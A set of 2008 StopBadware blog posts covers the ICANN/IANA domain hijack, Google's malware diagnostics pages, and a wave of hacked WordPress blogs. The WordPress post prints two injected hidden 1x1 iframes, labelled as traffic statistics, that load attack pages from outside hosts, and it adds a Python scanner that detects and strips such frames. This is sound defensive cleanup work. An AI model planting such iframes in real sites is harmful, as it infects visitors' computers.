No such thing as a guaranteed safe site

Posted on June 27, 2008 - 12:22 by egeorge

When I talk to friends about web-based badware, one of the most frequent things I hear is a version of "Oh, I don't have to worry about that - I don't go to any sketchy sites." The security world has known for a while now that even legitimate, trusted websites can be hacked, but that knowledge still hasn't made its way out to much of the public. It often takes the hacking of a prominent site to shatter the illusion.

This week, the website of ICANN, the Internet Corporation for Assigned Names and Numbers, was hacked and defaced, along with the site for IANA, the Internet Assigned Numbers Authority. ICANN is the group in charge of internet governance at its most basic level, choosing which new top-level domains (like .com or .org) to create, and setting the protocols for how internet addresses work. Ironically, it was the domain name settings for the ICANN and IANA sites themselves that were hacked and redirected to a page with a derisive message.

The hackers fortunately are a group from Turkey apparently more interested in mischief and notoriety than in harming users' computers, but it would have been easy to redirect ICANN and IANA visitors to a malicious site had that been the hackers' goal.

The lesson? As ZDNet's "Dancho Danchev put it":http://blogs.zdnet.com/security/?p=1356&tag=nl.e539:

bq. One thing’s for sure though, if the ICANN and IANA can lose control of their domains, anyone can.

Google's new resource for owners of compromised sites

Posted on May 21, 2008 - 15:07 by egeorge

Google has rolled out a new resource for owners of compromised websites that it flags as potentially dangerous in its search results.

"Google Diagnostics":http://googleonlinesecurity.blogspot.com/2008/05/safe-browsing-diagnosti... shows information about malware and malware-distributing behaviors that Google has observed on the site within the past 90 days.

We're already hearing from website owners and the volunteers in our "discussion group":http://groups.google.com/group/stopbadware that the new diagnostics pages are helpful in discovering problems with a site. We'd like to applaud Google for taking this step in greater transparency. This new resource should help website owners in cleaning and securing their sites faster, which will help protect even more internet users.

You can see an example diagnostics page "here":http://www.google.com/safebrowsing/diagnostic?site=http://malware.testin....

StopBadware discussion group sees flurry of hacked WordPress blogs

Posted on February 18, 2008 - 16:23 by egeorge

We like to feature occasional guest posts from members of the StopBadware community. Below, guest poster and StopBadware discussion group volunteer Steven Whitney sheds some light on a recent flurry of attacks on WordPress sites:

The StopBadware discussion group began receiving in January a flurry of reports about WordPress blogs suddenly flagged for badware by Google. The blogs had been hacked, and one or both of the following iframes were injected into their posts:

<!-- Traffic Statistics -->
<iframe src="http://www.wp-stats-php. info/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

<!-- Traffic Statistics -->
<iframe src="http://61.132.75. 71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->

In spite of their innocent-looking labeling, these links weren't put on the pages by the authors, and they're not for traffic statistics. The iframes, hosted on sites in Beijing, China, attack a visitor's computer with the virus

In this StopBadware thread about the iframes, a post by member Ty H describes how to use WordPress Site Admin to repair defaced blog posts.
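Repairing posts by hand in Site Admin works for a handful of entries, but a blog with hundreds of posts needs a way to find every injected frame. The following is an added example (not StopBadware's, WordPress's, or the guest poster's code) that scans a post body for iframes matching the pattern described above: a frame rendered at 1x1 pixels or hidden by style, or one pointing at a raw IP address, whose source is not the blog's own host. The sample post body, the blog host name `myblog.example`, and the iframe hosts in it are all constructed for the example; real injected hosts should be taken from the affected site's own pages.

```python
"""Find and strip hidden/injected iframes from WordPress post HTML.

Added example; not code from StopBadware or WordPress. The sample post
body and host names below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "myblog.example"  # assumed: the blog's own host, kept as a legitimate embed source

# Constructed sample post: real content, one injected "Traffic Statistics"
# block shaped like the reported ones (host replaced), and a legitimate embed.
SAMPLE_POST = """<p>Welcome to my blog.</p>
<!-- Traffic Statistics -->
<iframe src="http://stats.example.invalid/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe>
<!-- End Traffic Statistics -->
<p>More text.</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>.*?</iframe>", re.IGNORECASE | re.DOTALL)
EMPTY_WRAPPER_RE = re.compile(
    r"<!--\s*Traffic Statistics\s*-->\s*<!--\s*End Traffic Statistics\s*-->\s*",
    re.IGNORECASE,
)


def iframe_attrs(fragment):
    """Parse one <iframe ...></iframe> fragment into its attribute dict."""
    class OneTag(HTMLParser):
        attrs = None

        def handle_starttag(self, tag, attrs):
            if tag == "iframe" and self.attrs is None:
                self.attrs = dict(attrs)

    parser = OneTag()
    parser.feed(fragment)
    return parser.attrs or {}


def _px(value):
    """Turn '1', '1px' or '315' into an int; anything else into None."""
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return None


def is_suspicious(attrs, site_host=SITE_HOST):
    """True for an external iframe that is 1x1, style-hidden, or served from a raw IP."""
    host = urlparse(attrs.get("src", "")).hostname or ""
    height, width = _px(attrs.get("height")), _px(attrs.get("width"))
    tiny = height is not None and width is not None and height <= 1 and width <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    hidden_style = "display:none" in style or "visibility:hidden" in style
    raw_ip = re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) is not None
    external = host != "" and host != site_host
    return external and (tiny or hidden_style or raw_ip)


def scan_post(html, site_host=SITE_HOST):
    """Return (list of suspicious iframe src values, cleaned post HTML)."""
    findings = []

    def replace(match):
        attrs = iframe_attrs(match.group(0))
        if is_suspicious(attrs, site_host):
            findings.append(attrs.get("src", ""))
            return ""  # drop the injected frame, keep everything else
        return match.group(0)

    cleaned = IFRAME_RE.sub(replace, html)
    # Remove "Traffic Statistics" comment pairs that now wrap nothing.
    cleaned = EMPTY_WRAPPER_RE.sub("", cleaned)
    return findings, cleaned


if __name__ == "__main__":
    found, fixed = scan_post(SAMPLE_POST)
    print("suspicious iframes:", found)
    print(fixed)
```

Run it over each post's `post_content` pulled from the database (or over the rendered pages) and treat any non-empty findings list as a post that needs repair. The legitimate video embed survives because it is full-sized and not hidden; the 1x1 "statistics" frame is removed along with its empty comment wrapper. Cleaning the posts is only half the job, as the next paragraph says: the hole that let the frames in still has to be closed.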

In addition to repairing the pages, webmasters need to close the vulnerability that allows the iframe injections to occur.

On Feb. 5, WordPress issued version 2.3.3, an urgent security release to patch a flaw in xmlrpc.php that allowed a user to edit posts of other users. It's not stated whether this release is a response to the iframe injections, but the discussion group members who upgraded to WP 2.3.3 have so far not reported recurrences.

New versions of WordPress should always be installed promptly because the popular blogging software is heavily targeted by hackers using automated crawlers. You can register at to receive email notifications when new versions are announced. Enter your email address in the box at the bottom of the page.

A list of known WordPress vulnerabilities can be found at

When users solve problems together in the StopBadware discussion group and report their findings, it helps others who encounter the same problem later.